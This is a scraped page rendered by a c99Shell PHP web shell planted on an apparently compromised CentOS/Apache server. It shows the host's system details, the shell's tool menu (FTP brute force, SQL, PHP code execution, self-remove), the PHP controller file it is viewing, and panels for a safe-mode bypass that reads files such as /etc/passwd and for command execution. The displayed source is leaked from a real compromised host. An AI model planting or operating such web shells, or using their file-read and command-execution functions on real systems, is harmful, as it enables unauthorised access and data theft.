110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/application/controllers/info/ drwxr-xr-x Free 52 GB of 127.8 GB (40.69%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php
require ('application/controllers/my_controller.php');
class Info extends My_controller {

/*
    public function __construct()
    {
        parent::Controller();
        $this->load->library('session');
        if (!$this->session->userdata('logged_in'))
        {
            redirect('/login');
        }
        else {
            $uri = uri_string();
            $uo_id =  $this->session->userdata('useroffId');
            //echo "$uo_id , $uri";
            $this->load->model('m_ad_user_officer','uf');
            $result = $this->uf->checkMenu($uo_id,$uri);
            if(!$result){
               redirect('officer/unAuthorize');
            }
            
        }
    }*/
/*
    function index() {
        $data = ' ';
        $this->body = $this->load->view('info/v_info',' ',true);
        $this->show();
    }

    function user_login(){
        $un = $this->input->post('Username');
        $pwd = $this->input->post('Password');
        $nowDate = $this->input->post('nowDate');

        $this->load->model('ums/m_umuser','obj');
        $rs = $this->obj->check_user($un, $pwd);
        if($rs){
            $data = array(    'UsID'  => $rs['UsID'],
                            'UsName' => $rs['UsName'],
                            'UsLogin' => $rs['UsLogin'],
                            'UsPsCode' => $rs['UsPsCode'],
                            'UsWgID' => $rs['UsWgID'],
                            'logged_in'  => TRUE );
            $this->session->set_userdata($data);

            $this->load->model('eregis/m_rg_termconfig','tmc');
            
            $nowDateCv = splitDateForm2($nowDate);
            $record = $this->tmc->getByBetweenDate($nowDateCv);
            if($record){
                $rc = $record->row();
                //$this->config->set_item('ACADYEAR', $rc->tmcAcY);
                //$this->config->set_item('SEMESTER', $rc->tmCode);
                $data2 = array(    'acY'  => $rc->tmcAcY,
                                'tmId'  => $rc->tmcTmId, 
                                'tmCode'  => $rc->tmCode);
                $this->session->set_userdata($data2);
            }
            $today = date('Y-m-d');
            $record2 = $this->tmc->getByBetweenDate($today);
            if($record2){
                $rc = $record2->row();
                $data3 = array(    'acY_R'  => $rc->tmcAcY,
                                'tmId_R'  => $rc->tmcTmId, 
                                'tmCode_R'  => $rc->tmCode);
                $this->session->set_userdata($data3);
            }
            redirect('info/info/showSystem');
        }
           else{
              $this->session->set_flashdata('message', '<div id="message" align="center"><font color="red">ชื่อเข้าใช้งานหรือรหัสผ่านผิดพลาด</font></div>');
            redirect('info/info');
        }
    }
*/

    function microtime_float()
    {
        list($usec, $sec) = explode(" ", microtime());
        return ((float)$usec + (float)$sec);
    }

    function showSystem(){
        $this->session->unset_userdata('mmn');
        $this->session->unset_userdata('StID');
        $this->session->unset_userdata('GpID');
        $this->session->unset_userdata('MnID');

        $uid = $this->session->userdata('UsID');
        $this->load->model('ums/m_umgroup','');
        $data['system'] = $this->m_umgroup->RSWorkGroupByUsID($uid);
        $this->body = $this->load->view('info/v_info',$data,TRUE);
        $this->show();
    }

    function mainMenu($stid='',$gpid=''){
        if ($this->input->server('REQUEST_METHOD') === 'POST')
        {// do something 
            $stid = $this->input->post('stid');
            $gpid = $this->input->post('gpid');
        }

            $this->load->model('ums/m_umgroup','obj');
            $rs = $this->obj->getGpNameTByIdStId($stid,$gpid);
            $name = preg_split('[-]', $rs['GpNameT']);
            if(!isset($name[1]))
                $name[1] = $name[0];
//            if(!isset($name[1])){
//                $name[1] = $name[0];
//                $name[0] = $rs['StNameT'];
//            }

            $sys = array(    'StName'  => $name[0],
                            'GpName' => $name[1],
                            'StID' => $stid,
                            'GpID' => $gpid);
                    
            $this->session->set_userdata($sys);
            $this->body = $this->load->view('info/v_info','',TRUE);
            $this->show();
    }

    function subMenu($stid='',$mnid=''){//$stid,$mnid
        if ($this->input->server('REQUEST_METHOD') === 'POST')
        {// do something 
            $stid = $this->input->post('stid');
            $mnid = $this->input->post('mnid');
        }

            $this->session->set_userdata('MnID',$mnid);

            $stid = $this->session->userdata('StID');
            $gpid = $this->session->userdata('GpID');
            $UsID = $this->session->userdata('UsID');

        //    $this->setCRUD($UsID,$gpid,$mnid);


            $this->load->model('ums/m_ummenu','');
            $rsmn = $this->m_ummenu->SearchByMnID($mnid);

            if($rsmn['MnURL']!=""){
                redirect($rsmn['StURL'].$rsmn['MnURL']);
            }else{
                $i = 0;
                $m1 = array();
                $this->getMenu($m1,$i,$stid,$gpid,$UsID,$mnid,1);
/*
            $rs = $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,$mnid,1);
            foreach($rs->result() as $r){
                $m1[$i] = array( 'MnStID' => $r->MnStID,
                                'MnID' => $r->MnID,
                                'MnNameT' => $r->MnNameT,
                                'MnURL' => $r->MnURL,
                                'MnLevel' => $r->MnLevel,
                                'StURL' => $r->StURL);
                $i++;

                $rs2 = $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,$r->MnID,2);
                foreach($rs2->result() as $r2){
                    $m1[$i] = array( 
                                'MnStID' => $r2->MnStID,
                                'MnID' => $r2->MnID,
                                'MnNameT' => $r2->MnNameT,
                                'MnURL' => $r2->MnURL,
                                'MnLevel' => $r2->MnLevel,
                                'StURL' => $r->StURL);
                    $i++;
                }
            }
*/
            $sm = array( 'sm' => $m1);    
            $this->body = $this->load->view('info/v_info',$sm,TRUE);
            $this->show();
            }
    }

    function getMenu(&$m1,&$i,$stid,$gpid,$UsID,$mnid,$mnlevel){
        $this->load->model('ums/m_ummenu','mn');
        $mn = $this->mn;
        $rs = $mn->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,$mnid,$mnlevel);
        foreach($rs->result() as $r){
            $m1[$i] = array( 'MnStID' => $r->MnStID,
                            'MnID' => $r->MnID,
                            'MnNameT' => $r->MnNameT,
                            'MnURL' => $r->MnURL,
                            'MnLevel' => $r->MnLevel,
                            'StURL' => $r->StURL);
            $i++;
            $rs = $mn->RSByParentMn($r->MnID);
            if($rs->num_rows() > 0) {
                $level = $mnlevel+1;
                $this->getMenu($m1,$i,$stid,$gpid,$UsID,$r->MnID,$level);
            }
        }
    }
}
?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: